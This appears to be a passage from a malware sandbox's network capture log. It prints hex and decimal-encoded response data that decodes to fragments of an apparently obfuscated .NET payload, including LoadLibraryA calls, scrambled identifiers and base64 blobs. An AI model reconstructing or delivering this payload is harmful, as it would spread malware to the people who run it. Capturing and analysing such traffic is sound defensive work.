                                                                                              2021-09-27 18:27:45 UTC2491INData Raw: 32 20 31 38 20 31 31 33 20 30 20 35 32 20 30 20 31 37 32 20 31 38 20 31 31 33 20 30 20 32 38 20 30 20 32 34 30 20 34 20 30 20 31 20 33 36 20 30 20 32 34 30 20 34 20 30 20 31 20 34 34 20 30 20 32 34 30 20 34 20 30 20 31 20 35 32 20 30 20 32 34 30 20 34 20 30 20 31 20 31 37 20 30 20 32 30 31 20 32 30 20 32 31 38 20 30 20 31 37 20 30 20 31 39 30 20 35 20 32 32 33 20 30 20 32 30 39 20 33 20 32 32 35 20 34 20 37 20 31 37 20 36 38 20 30 20 32 33 37 20 31 30 20 32 35 32 20 30 20 32 31 37 20 33 20 32 33 35 20 31 37 20 34 34 20 31 37 20 38 31 20 33 20 32 31 36 20 31 37 20 35 33 20 31 37 20 32 31 37 20 33 20 31 38 37 20 31 31 20 31 31 33 20 31 37 20 31 32 31 20 31 20 32 33 38 20 30 20 31 31 39 20 31 37 20 31 34 35 20 31 20 31 37 32 20 31 38 20 32 33 36 20 39 20 32
                                                                                              Data Ascii: 2 18 113 0 52 0 172 18 113 0 28 0 240 4 0 1 36 0 240 4 0 1 44 0 240 4 0 1 52 0 240 4 0 1 17 0 201 20 218 0 17 0 190 5 223 0 209 3 225 4 7 17 68 0 237 10 252 0 217 3 235 17 44 17 81 3 216 17 53 17 217 3 187 11 113 17 121 1 238 0 119 17 145 1 172 18 236 9 2
                                                                                              2021-09-27 18:27:45 UTC2507INData Raw: 36 20 35 35 20 35 37 20 38 38 20 35 33 20 35 37 20 37 39 20 31 30 30 20 35 35 20 35 37 20 38 33 20 35 36 20 31 30 32 20 35 36 20 30 20 36 30 20 37 37 20 31 31 31 20 31 30 30 20 31 31 37 20 31 30 38 20 31 30 31 20 36 32 20 30 20 37 31 20 31 30 31 20 31 31 36 20 37 37 20 31 31 31 20 31 30 30 20 31 31 37 20 31 30 38 20 31 30 31 20 37 30 20 31 30 35 20 31 30 38 20 31 30 31 20 37 38 20 39 37 20 31 30 39 20 31 30 31 20 36 35 20 30 20 37 36 20 31 31 31 20 39 37 20 31 30 30 20 37 36 20 31 30 35 20 39 38 20 31 31 34 20 39 37 20 31 31 34 20 31 32 31 20 36 35 20 30 20 39 35 20 39 35 20 39 35 20 36 37 20 38 36 20 37 37 20 35 35 20 35 34 20 31 30 30 20 31 30 30 20 31 30 31 20 31 31 32 20 31 30 32 20 35 37 20 35 35 20 34 38 20 36 38 20 30 20 36 35 20 31 30 38 20 31 30
                                                                                              Data Ascii: 6 55 57 88 53 57 79 100 55 57 83 56 102 56 0 60 77 111 100 117 108 101 62 0 71 101 116 77 111 100 117 108 101 70 105 108 101 78 97 109 101 65 0 76 111 97 100 76 105 98 114 97 114 121 65 0 95 95 95 67 86 77 55 54 100 100 101 112 102 57 55 48 68 0 65 108 10
                                                                                              2021-09-27 18:27:45 UTC2523INData Raw: 36 20 38 32 20 31 31 37 20 31 31 30 20 31 31 36 20 31 30 35 20 31 30 39 20 31 30 31 20 34 36 20 36 37 20 31 31 31 20 31 30 39 20 31 31 32 20 31 30 35 20 31 30 38 20 31 30 31 20 31 31 34 20 38 33 20 31 30 31 20 31 31 34 20 31 31 38 20 31 30 35 20 39 39 20 31 30 31 20 31 31 35 20 30 20 37 39 20 31 31 32 20 39 39 20 31 31 31 20 31 30 30 20 31 30 31 20 31 31 35 20 30 20 38 30 20 31 31 34 20 31 31 31 20 31 31 32 20 31 30 31 20 31 31 34 20 31 31 36 20 31 30 35 20 31 30 31 20 31 31 35 20 30 20 31 30 35 20 31 31 30 20 31 30 34 20 31 30 31 20 31 31 34 20 31 30 35 20 31 31 36 20 37 32 20 39 37 20 31 31 30 20 31 30 30 20 31 30 38 20 31 30 31 20 31 31 35 20 30 20 31 30 33 20 31 30 31 20 31 31 36 20 39 35 20 37 38 20 39 37 20 31 30 39 20 31 30 31 20 31 31 35 20 30 20
                                                                                              Data Ascii: 6 82 117 110 116 105 109 101 46 67 111 109 112 105 108 101 114 83 101 114 118 105 99 101 115 0 79 112 99 111 100 101 115 0 80 114 111 112 101 114 116 105 101 115 0 105 110 104 101 114 105 116 72 97 110 100 108 101 115 0 103 101 116 95 78 97 109 101 115 0
                                                                                              2021-09-27 18:27:45 UTC2539INData Raw: 33 31 20 31 37 34 20 31 38 34 20 32 33 31 20 31 37 35 20 31 36 35 20 32 33 31 20 31 37 34 20 31 37 36 20 32 33 31 20 31 37 35 20 31 32 39 20 32 33 31 20 31 37 35 20 31 33 31 20 32 33 31 20 31 37 34 20 31 37 38 20 32 33 31 20 31 37 35 20 31 36 30 20 32 33 31 20 31 37 35 20 31 36 31 20 32 33 31 20 31 37 35 20 31 33 32 20 30 20 32 32 35 20 31 38 33 20 31 38 34 20 32 32 35 20 31 38 33 20 31 38 39 20 32 32 35 20 31 38 33 20 31 33 32 20 32 32 35 20 31 38 33 20 31 38 36 20 32 32 35 20 31 38 33 20 31 36 39 20 32 32 35 20 31 38 34 20 31 33 30 20 32 32 35 20 31 38 33 20 31 33 32 20 32 32 35 20 31 38 33 20 31 33 32 20 32 32 35 20 31 38 33 20 31 34 30 20 32 32 35 20 31 38 33 20 31 38 36 20 32 32 35 20 31 38 33 20 31 33 37 20 32 32 35 20 31 38 33 20 31 38 31 20 32 32
                                                                                              Data Ascii: 31 174 184 231 175 165 231 174 176 231 175 129 231 175 131 231 174 178 231 175 160 231 175 161 231 175 132 0 225 183 184 225 183 189 225 183 132 225 183 186 225 183 169 225 184 130 225 183 132 225 183 132 225 183 140 225 183 186 225 183 137 225 183 181 22
                                                                                              2021-09-27 18:27:45 UTC2555INData Raw: 20 31 38 36 20 31 38 32 20 32 33 32 20 31 38 36 20 31 34 30 20 32 33 32 20 31 38 36 20 31 33 38 20 32 33 32 20 31 38 36 20 31 36 35 20 32 33 32 20 31 38 36 20 31 33 38 20 32 33 32 20 31 38 36 20 31 34 30 20 32 33 32 20 31 38 36 20 31 36 37 20 32 33 32 20 31 38 37 20 31 33 39 20 32 33 32 20 31 38 36 20 31 33 39 20 30 20 31 39 37 20 31 39 30 20 31 39 37 20 31 34 35 20 31 39 37 20 31 33 39 20 31 39 37 20 31 34 34 20 31 39 37 20 31 39 30 20 31 39 37 20 31 34 31 20 31 39 37 20 31 33 37 20 31 39 38 20 31 33 39 20 31 39 37 20 31 34 35 20 31 39 37 20 31 38 39 20 31 39 37 20 31 33 36 20 31 39 37 20 31 34 31 20 31 39 37 20 31 34 30 20 31 39 37 20 31 38 38 20 31 39 38 20 31 33 39 20 30 20 32 32 39 20 31 33 34 20 31 35 33 20 32 32 39 20 31 33 34 20 31 35 33 20 32 32
                                                                                              Data Ascii: 186 182 232 186 140 232 186 138 232 186 165 232 186 138 232 186 140 232 186 167 232 187 139 232 186 139 0 197 190 197 145 197 139 197 144 197 190 197 141 197 137 198 139 197 145 197 189 197 136 197 141 197 140 197 188 198 139 0 229 134 153 229 134 153 22
                                                                                              2021-09-27 18:27:45 UTC2571INData Raw: 35 36 20 31 34 38 20 32 32 38 20 31 35 36 20 31 33 38 20 32 32 38 20 31 35 35 20 31 34 37 20 32 32 38 20 31 35 35 20 31 35 30 20 32 32 38 20 31 35 36 20 31 35 33 20 32 32 38 20 31 35 36 20 31 34 34 20 32 32 38 20 31 35 35 20 31 38 34 20 32 32 38 20 31 35 35 20 31 35 33 20 32 32 38 20 31 35 36 20 31 33 32 20 32 32 38 20 31 35 35 20 31 34 34 20 32 32 38 20 31 35 35 20 31 35 32 20 32 32 38 20 31 35 35 20 31 34 38 20 32 32 38 20 31 35 35 20 31 35 31 20 32 32 38 20 31 35 35 20 31 34 36 20 30 20 32 33 36 20 31 35 37 20 31 38 34 20 32 33 36 20 31 35 37 20 31 39 31 20 32 33 36 20 31 35 37 20 31 37 35 20 32 33 36 20 31 35 36 20 31 38 35 20 32 33 36 20 31 35 37 20 31 36 38 20 32 33 36 20 31 35 36 20 31 38 38 20 32 33 36 20 31 35 36 20 31 38 31 20 32 33 36 20 31 35
                                                                                              Data Ascii: 56 148 228 156 138 228 155 147 228 155 150 228 156 153 228 156 144 228 155 184 228 155 153 228 156 132 228 155 144 228 155 152 228 155 148 228 155 151 228 155 146 0 236 157 184 236 157 191 236 157 175 236 156 185 236 157 168 236 156 188 236 156 181 236 15
                                                                                              2021-09-27 18:27:45 UTC2587INData Raw: 20 31 38 36 20 32 33 32 20 31 36 34 20 31 38 35 20 32 33 32 20 31 36 34 20 31 37 38 20 32 33 32 20 31 36 34 20 31 34 38 20 32 33 32 20 31 36 34 20 31 34 35 20 32 33 32 20 31 36 34 20 31 34 39 20 32 33 32 20 31 36 34 20 31 36 38 20 32 33 32 20 31 36 35 20 31 33 35 20 32 33 32 20 31 36 35 20 31 33 37 20 32 33 32 20 31 36 35 20 31 33 32 20 32 33 32 20 31 36 34 20 31 34 35 20 32 33 32 20 31 36 34 20 31 36 37 20 32 33 32 20 31 36 35 20 31 33 38 20 32 33 32 20 31 36 34 20 31 35 33 20 30 20 32 33 31 20 31 37 31 20 31 35 35 20 32 33 31 20 31 37 32 20 31 33 37 20 32 33 31 20 31 37 31 20 31 35 35 20 32 33 31 20 31 37 31 20 31 38 32 20 32 33 31 20 31 37 31 20 31 35 35 20 32 33 31 20 31 37 31 20 31 35 34 20 32 33 31 20 31 37 31 20 31 37 30 20 32 33 31 20 31 37 31 20
                                                                                              Data Ascii: 186 232 164 185 232 164 178 232 164 148 232 164 145 232 164 149 232 164 168 232 165 135 232 165 137 232 165 132 232 164 145 232 164 167 232 165 138 232 164 153 0 231 171 155 231 172 137 231 171 155 231 171 182 231 171 155 231 171 154 231 171 170 231 171
                                                                                              2021-09-27 18:27:45 UTC2603INData Raw: 37 38 20 32 33 33 20 31 36 31 20 31 32 38 20 32 33 33 20 31 36 30 20 31 37 35 20 32 33 33 20 31 36 31 20 31 35 39 20 32 33 33 20 31 36 31 20 31 35 39 20 32 33 33 20 31 36 31 20 31 37 30 20 32 33 33 20 31 36 30 20 31 37 33 20 32 33 33 20 31 36 30 20 31 37 34 20 32 33 33 20 31 36 30 20 31 37 39 20 32 33 33 20 31 36 30 20 31 37 34 20 32 33 33 20 31 36 30 20 31 37 31 20 32 33 33 20 31 36 30 20 31 38 30 20 32 33 33 20 31 36 31 20 31 36 30 20 32 33 33 20 31 36 31 20 31 36 30 20 30 20 32 32 34 20 31 36 35 20 31 34 33 20 32 32 34 20 31 36 35 20 31 35 30 20 32 32 34 20 31 36 35 20 31 36 30 20 32 32 34 20 31 36 35 20 31 34 39 20 32 32 34 20 31 36 36 20 31 32 38 20 32 32 34 20 31 36 36 20 31 33 38 20 32 32 34 20 31 36 35 20 31 35 32 20 32 32 34 20 31 36 35 20 31 35
                                                                                              Data Ascii: 78 233 161 128 233 160 175 233 161 159 233 161 159 233 161 170 233 160 173 233 160 174 233 160 179 233 160 174 233 160 171 233 160 180 233 161 160 233 161 160 0 224 165 143 224 165 150 224 165 160 224 165 149 224 166 128 224 166 138 224 165 152 224 165 15
                                                                                              2021-09-27 18:27:45 UTC2619INData Raw: 33 38 20 31 37 33 20 31 33 33 20 32 33 38 20 31 37 33 20 31 33 30 20 32 33 38 20 31 37 32 20 31 34 39 20 32 33 38 20 31 37 33 20 31 33 38 20 32 33 38 20 31 37 32 20 31 35 31 20 32 33 38 20 31 37 33 20 31 34 36 20 32 33 38 20 31 37 32 20 31 35 31 20 32 33 38 20 31 37 32 20 31 36 37 20 30 20 32 33 30 20 31 38 38 20 31 37 34 20 32 33 30 20 31 38 38 20 31 34 30 20 32 33 30 20 31 38 38 20 31 34 32 20 32 33 30 20 31 38 37 20 31 37 30 20 32 33 30 20 31 38 37 20 31 36 36 20 32 33 30 20 31 38 38 20 31 33 31 20 32 33 30 20 31 38 38 20 31 36 35 20 32 33 30 20 31 38 37 20 31 37 35 20 32 33 30 20 31 38 38 20 31 36 33 20 32 33 30 20 31 38 37 20 31 37 33 20 32 33 30 20 31 38 38 20 31 35 38 20 32 33 30 20 31 38 38 20 31 35 33 20 32 33 30 20 31 38 38 20 31 32 39 20 32 33
                                                                                              Data Ascii: 38 173 133 238 173 130 238 172 149 238 173 138 238 172 151 238 173 146 238 172 151 238 172 167 0 230 188 174 230 188 140 230 188 142 230 187 170 230 187 166 230 188 131 230 188 165 230 187 175 230 188 163 230 187 173 230 188 158 230 188 153 230 188 129 23
                                                                                              2021-09-27 18:27:45 UTC2635INData Raw: 20 31 37 39 20 31 34 35 20 32 32 35 20 31 37 38 20 31 35 39 20 32 32 35 20 31 37 38 20 31 36 34 20 32 32 35 20 31 37 38 20 31 36 32 20 32 32 35 20 31 37 38 20 31 36 34 20 32 32 35 20 31 37 38 20 31 36 35 20 32 32 35 20 31 37 38 20 31 35 36 20 32 32 35 20 31 37 39 20 31 34 38 20 32 32 35 20 31 37 38 20 31 37 35 20 32 32 35 20 31 37 38 20 31 36 33 20 32 32 35 20 31 37 39 20 31 33 30 20 32 32 35 20 31 37 38 20 31 36 30 20 32 32 35 20 31 37 38 20 31 37 35 20 30 20 32 33 34 20 31 38 34 20 31 34 36 20 32 33 34 20 31 38 33 20 31 37 36 20 32 33 34 20 31 38 34 20 31 36 34 20 32 33 34 20 31 38 34 20 31 36 36 20 32 33 34 20 31 38 34 20 31 33 34 20 32 33 34 20 31 38 33 20 31 37 36 20 32 33 34 20 31 38 33 20 31 38 30 20 32 33 34 20 31 38 34 20 31 35 34 20 32 33 34 20
                                                                                              Data Ascii: 179 145 225 178 159 225 178 164 225 178 162 225 178 164 225 178 165 225 178 156 225 179 148 225 178 175 225 178 163 225 179 130 225 178 160 225 178 175 0 234 184 146 234 183 176 234 184 164 234 184 166 234 184 134 234 183 176 234 183 180 234 184 154 234
                                                                                              2021-09-27 18:27:45 UTC2651INData Raw: 20 31 36 33 20 32 33 30 20 31 37 30 20 31 38 36 20 32 33 30 20 31 37 31 20 31 35 35 20 32 33 30 20 31 37 31 20 31 33 33 20 32 33 30 20 31 37 31 20 31 36 35 20 32 33 30 20 31 37 31 20 31 36 39 20 32 33 30 20 31 37 31 20 31 36 33 20 32 33 30 20 31 37 31 20 31 38 31 20 30 20 32 33 31 20 31 37 30 20 31 37 32 20 32 33 31 20 31 37 31 20 31 35 39 20 32 33 31 20 31 37 30 20 31 38 30 20 32 33 31 20 31 37 31 20 31 37 37 20 32 33 31 20 31 37 31 20 31 35 36 20 32 33 31 20 31 37 30 20 31 37 38 20 32 33 31 20 31 37 30 20 31 37 31 20 32 33 31 20 31 37 31 20 31 37 37 20 32 33 31 20 31 37 31 20 31 36 31 20 32 33 31 20 31 37 31 20 31 35 36 20 32 33 31 20 31 37 31 20 31 33 35 20 32 33 31 20 31 37 31 20 31 37 31 20 32 33 31 20 31 37 30 20 31 37 32 20 32 33 31 20 31 37 30 20
                                                                                              Data Ascii: 163 230 170 186 230 171 155 230 171 133 230 171 165 230 171 169 230 171 163 230 171 181 0 231 170 172 231 171 159 231 170 180 231 171 177 231 171 156 231 170 178 231 170 171 231 171 177 231 171 161 231 171 156 231 171 135 231 171 171 231 170 172 231 170
                                                                                              2021-09-27 18:27:45 UTC2667INData Raw: 33 39 20 32 32 37 20 31 36 32 20 31 37 38 20 32 32 37 20 31 36 32 20 31 38 39 20 30 20 32 32 34 20 31 36 35 20 31 35 32 20 32 32 34 20 31 36 34 20 31 37 33 20 32 32 34 20 31 36 35 20 31 35 34 20 32 32 34 20 31 36 34 20 31 37 33 20 32 32 34 20 31 36 35 20 31 34 34 20 32 32 34 20 31 36 35 20 31 35 37 20 32 32 34 20 31 36 35 20 31 33 37 20 32 32 34 20 31 36 35 20 31 37 37 20 32 32 34 20 31 36 34 20 31 36 39 20 32 32 34 20 31 36 35 20 31 35 36 20 32 32 34 20 31 36 34 20 31 37 34 20 32 32 34 20 31 36 34 20 31 36 37 20 32 32 34 20 31 36 35 20 31 36 39 20 32 32 34 20 31 36 35 20 31 34 34 20 32 32 34 20 31 36 34 20 31 38 39 20 30 20 32 32 36 20 31 36 39 20 31 36 35 20 32 32 36 20 31 37 30 20 31 32 38 20 32 32 36 20 31 36 39 20 31 33 34 20 32 32 36 20 31 36 39 20
                                                                                              Data Ascii: 39 227 162 178 227 162 189 0 224 165 152 224 164 173 224 165 154 224 164 173 224 165 144 224 165 157 224 165 137 224 165 177 224 164 169 224 165 156 224 164 174 224 164 167 224 165 169 224 165 144 224 164 189 0 226 169 165 226 170 128 226 169 134 226 169
                                                                                              2021-09-27 18:27:45 UTC2683INData Raw: 35 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 35 30 20 30 20 36 39 20 30 20 37 37 20 30 20 37 32 20 30 20 31 31 31 20 30 20 36 39 20 30 20 37 33 20 30 20 31 30 38 20 30 20 31 30 30 20 30 20 34 33 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37 20 30 20 38 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 35 20 30 20 37 37 20 30 20 38 35 20 30 20 34 37 20 30 20 35 37 20 30 20 35 30 20 30 20 36 39 20 30 20 37 33 20 30 20 31 31 35 20 30 20 31 30 30 20 30 20 31 30 36 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 38 34 20 30 20 37 39 20 30 20 34 38 20 30 20 38 35 20
                                                                                              Data Ascii: 5 0 77 0 65 0 65 0 80 0 57 0 50 0 69 0 77 0 72 0 111 0 69 0 73 0 108 0 100 0 43 0 73 0 108 0 70 0 47 0 80 0 47 0 88 0 47 0 51 0 88 0 56 0 105 0 85 0 85 0 77 0 85 0 47 0 57 0 50 0 69 0 73 0 115 0 100 0 106 0 77 0 70 0 65 0 65 0 80 0 47 0 84 0 79 0 48 0 85
                                                                                              2021-09-27 18:27:45 UTC2699INData Raw: 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 36 20 30 20 31 32 32 20 30 20 31 31 34 20 30 20 37 36 20 30 20 38 39 20 30 20 35 30 20 30 20 37 30 20 30 20 34 37 20 30 20 38 30 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 38 38 20 30 20 39 30 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 33 20 30 20 37 37 20 30 20 35 37 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 35 36 20 30 20 38 35 20 30 20 36 39 20 30 20 37 36 20 30 20 38 34 20 30 20 35 32 20 30 20 31 31 31 20 30 20 35 30 20 30 20 37 30 20 30 20 34 37 20 30 20 38 30 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 39 30 20 30 20 38 31 20 30 20
                                                                                              Data Ascii: 0 68 0 120 0 66 0 122 0 114 0 76 0 89 0 50 0 70 0 47 0 80 0 51 0 47 0 47 0 49 0 68 0 111 0 88 0 90 0 99 0 65 0 65 0 73 0 118 0 73 0 77 0 57 0 74 0 88 0 106 0 85 0 88 0 56 0 85 0 69 0 76 0 84 0 52 0 111 0 50 0 70 0 47 0 80 0 51 0 47 0 47 0 49 0 90 0 81 0
                                                                                              2021-09-27 18:27:45 UTC2715INData Raw: 35 37 20 30 20 31 31 33 20 30 20 38 38 20 30 20 37 30 20 30 20 36 38 20 30 20 31 31 31 20 30 20 38 33 20 30 20 37 33 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 36 35 20 30 20 38 37 20 30 20 38 36 20 30 20 31 30 38 20 30 20 34 39 20 30 20 38 37 20 30 20 37 31 20 30 20 31 30 33 20 30 20 37 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 38 33 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 34 39 20 30 20 36 37 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 30 20 30 20 35 31 20 30 20 38 31 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20
                                                                                              Data Ascii: 57 0 113 0 88 0 70 0 68 0 111 0 83 0 73 0 52 0 65 0 65 0 73 0 88 0 65 0 87 0 86 0 108 0 49 0 87 0 71 0 103 0 73 0 65 0 103 0 65 0 65 0 106 0 89 0 88 0 83 0 43 0 80 0 47 0 47 0 85 0 49 0 67 0 74 0 88 0 102 0 120 0 109 0 105 0 90 0 51 0 81 0 43 0 80 0 47 0
                                                                                              2021-09-27 18:27:45 UTC2731INData Raw: 20 36 36 20 30 20 37 30 20 30 20 37 32 20 30 20 31 31 31 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 38 20 30 20 31 30 36 20 30 20 35 31 20 30 20 35 30 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 38 31 20 30 20 37 37 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 37 20 30 20 37 38 20 30 20 38 36 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 32 31 20 30 20 37 36 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 35 20 30 20 36 38 20 30 20 35 34 20 30 20 36 39 20 30 20 35 33 20 30 20 34 38 20 30 20 37 34 20 30 20 31 32 31 20 30 20 35 31 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 36 20 30 20 31 30 38 20 30 20 37 33 20 30 20 31 30 30
                                                                                              Data Ascii: 66 0 70 0 72 0 111 0 108 0 118 0 55 0 47 0 47 0 48 0 106 0 51 0 50 0 66 0 118 0 65 0 81 0 77 0 73 0 69 0 65 0 77 0 78 0 86 0 105 0 43 0 121 0 76 0 82 0 81 0 105 0 68 0 54 0 69 0 53 0 48 0 74 0 121 0 51 0 67 0 65 0 65 0 65 0 65 0 100 0 66 0 108 0 73 0 100
                                                                                              2021-09-27 18:27:45 UTC2747INData Raw: 36 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 31 20 30 20 31 30 34 20 30 20 39 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 37 20 30 20 31 30 38 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 39 20 30 20 31 32 32 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 37 34 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 34 39 20 30 20 37 39 20 30 20 37 36 20 30 20 38 38 20 30 20 31 31 39 20 30 20 38 33 20 30 20 37 30 20 30 20 35 30 20 30 20 34 39 20 30 20 39 37 20 30 20 37 36 20 30 20 35 36 20 30 20 37 32 20 30 20 38 31 20 30 20 37 38 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 38 31 20 30 20 36 35 20 30 20
                                                                                              Data Ascii: 69 0 65 0 103 0 65 0 65 0 73 0 115 0 71 0 104 0 99 0 66 0 48 0 67 0 108 0 68 0 47 0 70 0 99 0 122 0 65 0 81 0 65 0 67 0 68 0 74 0 103 0 66 0 101 0 119 0 49 0 79 0 76 0 88 0 119 0 83 0 70 0 50 0 49 0 97 0 76 0 56 0 72 0 81 0 78 0 103 0 51 0 52 0 81 0 65 0
                                                                                              2021-09-27 18:27:45 UTC2763INData Raw: 35 20 30 20 36 38 20 30 20 37 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20 38 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 36 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 39 38 20 30 20 31 31 31 20 30 20 38 34 20 30 20 37 39 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 31 31 37 20 30 20 37 31 20 30 20 37 35 20 30 20 37 30 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 35 32 20 30 20 36 36 20 30 20 38 38 20 30 20 38 31 20 30 20 37 34 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 31 30 30 20 30 20 36 35 20 30 20 38 31 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 31 35 20 30
                                                                                              Data Ascii: 5 0 68 0 77 0 56 0 66 0 65 0 85 0 71 0 103 0 69 0 66 0 65 0 65 0 65 0 105 0 56 0 98 0 111 0 84 0 79 0 118 0 47 0 47 0 52 0 117 0 71 0 75 0 70 0 115 0 65 0 65 0 73 0 80 0 52 0 66 0 88 0 81 0 74 0 103 0 47 0 103 0 71 0 100 0 65 0 81 0 122 0 119 0 79 0 115 0
                                                                                              2021-09-27 18:27:45 UTC2779INData Raw: 20 30 20 35 36 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 35 32 20 30 20 31 30 32 20 30 20 31 32 31 20 30 20 38 33 20 30 20 37 38 20 30 20 38 30 20 30 20 36 38 20 30 20 39 37 20 30 20 37 36 20 30 20 35 31 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 34 39 20 30 20 36 37 20 30 20 37 30 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 30 20 30 20 38 37 20 30 20 35 34 20 30 20 36 36 20 30 20 31 32 30 20 30 20 31 31 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 31 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 31 20 30 20 38 34 20 30 20 34 37 20 30 20 34 38 20 30 20 38 38 20 30 20 35 36 20
                                                                                              Data Ascii: 0 56 0 70 0 108 0 90 0 105 0 85 0 88 0 52 0 102 0 121 0 83 0 78 0 80 0 68 0 97 0 76 0 51 0 111 0 116 0 49 0 67 0 70 0 102 0 47 0 100 0 81 0 120 0 87 0 54 0 66 0 120 0 113 0 65 0 65 0 67 0 68 0 120 0 65 0 121 0 70 0 119 0 72 0 81 0 84 0 47 0 48 0 88 0 56
                                                                                              2021-09-27 18:27:45 UTC2795INData Raw: 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 34 33 20 30 20 35 34 20 30 20 37 38 20 30 20 31 30 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 33 20 30 20 37 39 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 36 20 30 20 31 31 39 20 30 20 35 37 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 37 38 20 30 20 31 30 33 20 30 20 34 38 20 30 20 38 38 20 30 20 35 36 20 30 20 36 36 20 30 20 31 30 37 20 30 20 37 39 20 30 20 36 38 20 30 20 31 32 30 20 30 20 31 30 33 20 30 20 37 37 20 30 20 35 35 20 30 20 38 38 20 30 20 38 31 20 30 20 31 32 30 20 30 20 31 32 31 20 30 20 31
                                                                                              Data Ascii: 0 85 0 80 0 57 0 49 0 47 0 73 0 118 0 43 0 54 0 78 0 100 0 103 0 65 0 65 0 67 0 78 0 82 0 103 0 79 0 68 0 120 0 66 0 119 0 57 0 65 0 67 0 65 0 65 0 65 0 72 0 77 0 78 0 103 0 48 0 88 0 56 0 66 0 107 0 79 0 68 0 120 0 103 0 77 0 55 0 88 0 81 0 120 0 121 0 1
                                                                                              2021-09-27 18:27:45 UTC2811INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 36 35 20 30 20 39 39 20 30 20 37 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 37 20 30 20 37 37 20 30 20 31 32 32 20 30 20 31 32 31 20 30 20 38 37 20 30 20 39 37 20 30 20 37 34 20 30 20 38 33 20 30 20 36 36 20 30 20 31 30 34 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 38 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 37 33 20 30 20 37 31 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 30 35 20 30 20 36 36 20 30 20 31 30 33 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20
